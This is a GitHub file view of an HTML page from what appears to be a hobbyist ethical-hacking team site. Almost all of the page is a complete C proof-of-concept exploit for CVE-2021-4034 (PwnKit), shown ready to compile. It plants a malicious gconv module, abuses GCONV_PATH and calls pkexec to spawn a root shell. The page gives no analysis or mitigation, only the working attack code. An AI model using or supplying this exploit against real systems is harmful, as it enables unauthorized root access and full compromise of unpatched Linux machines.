-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2021-4034.html
95 lines (92 loc) · 3.42 KB
/
cve-2021-4034.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Tenacious is a mostly positive term. If someone calls you tenacious you're probably the kind of person who never gives up and never stops trying; someone who does whatever is required to accomplish a goal. In our efforts to learn the craft of Ethical Hacking, we are T3n4ci0us!" />
<meta name="author" content="Rob" />
<title>T3n4ci0us - cve-2021-4034</title>
<link rel="icon" type="image/png" href="Guy-Fawkes.png" />
<link rel="stylesheet" href="css/reset.css">
<link rel="stylesheet" href="css/cts.css">
<script src="js/flag.js"></script>
<style>
#bottom{
width: 100%;
position: fixed;
bottom: 7px;
text-align: center;
}
.cts {
color: #C0C0C0;
font-weight: bold;
font-family: serif;
font-size: 12pt;
text-decoration: none;
}
.cts:hover {
color: #808080;
}
div.codescreen {
background-color: #151B24;
font-size: 12pt;
margin: auto;
width: 65%;
text-align: left;
padding: 10px;
}
@media screen and (max-width: 820px) {
div.codescreen {
width: 90%;
}
}
</style>
</head>
<body>
<div class="hero-image">
<div class="hero-text">
<a href="index.html" border="0" title="T3n4ci0us Hacking Team"><img src="Kali-Dragon.png" /></a>
</div>
</div>
<div class="rc_nav" id="centered_nav">
<a href="https://gchq.github.io/CyberChef/">CyberChef</a>
<a href="cve-2021-4034.html" title="cve-2021-4034.c">cve-2021-4034.c</a>
<a href="https://discord.com/channels/659793144711217163/787023376546922496">Discord</a>
<a href="javascript:void(0);" title="Menu" style="font-size:18px;" class="icon" onclick="navChange()">☰</a>
</div>
<div class="rc_content">
<div class="codescreen">
/*<br />
* Proof of Concept: pkexec (CVE-2021-4034)<br />
* gcc cve-2021-4034.c -o getroot<br />
*/<br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <unistd.h><br />
char *shell = <br />
"#include <stdio.h>\n"<br />
"#include <stdlib.h>\n"<br />
"#include <unistd.h>\n\n"<br />
"void gconv() {}\n"<br />
"void gconv_init() {\n"<br />
" setuid(0); setgid(0);\n"<br />
" seteuid(0); setegid(0);\n"<br />
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"<br />
" exit(0);\n"<br />
"}";<br />
<br />
int main(int argc, char *argv[]) {<br />
FILE *fp;<br />
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");<br />
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");<br />
fp = fopen("pwnkit/pwnkit.c", "w");<br />
fprintf(fp, "%s", shell);<br />
fclose(fp);<br />
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");<br />
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };<br />
execve("/usr/bin/pkexec", (char*[]){NULL}, env);<br />
}<br />
</div>
</div>
</body>
</html>